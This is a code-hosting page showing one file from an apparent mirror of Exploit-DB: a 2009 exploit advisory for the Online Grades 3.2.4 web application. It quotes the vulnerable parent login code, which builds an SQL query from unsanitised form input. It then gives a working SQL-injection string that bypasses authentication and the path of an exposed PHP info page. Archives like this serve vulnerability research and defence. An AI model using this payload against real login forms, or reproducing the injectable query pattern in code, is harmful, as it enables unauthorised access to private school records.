bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7956.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

28 lines
No EOL
893 B
Text
Raw Blame History

#########################################################################################
[0x01] Informations:
Script : Online Grades 3.2.4
Download : http://www.onlinegrades.org
Vulnerability : Auth Bypass - Php Info Disclosure
Author : x0r
Contact : x0r@live.it \ andry2000@hotmail.it
Website : NULL
#########################################################################################
[0x02] Bug: /parents/login.php
$username = $_POST['uname']; $pword = $_POST['pass'];
$mysql_query = "SELECT * from PARENTS where client_id = '$username' and
client_pw = '$pword';";
#########################################################################################
[0x03] Exploit:
Exploit: [validemail] ' or ' 1=1--
Php Info: /includes/phpinfo.php
#########################################################################################
# milw0rm.com [2009-02-03]
Reference in a new issue View git blame Copy permalink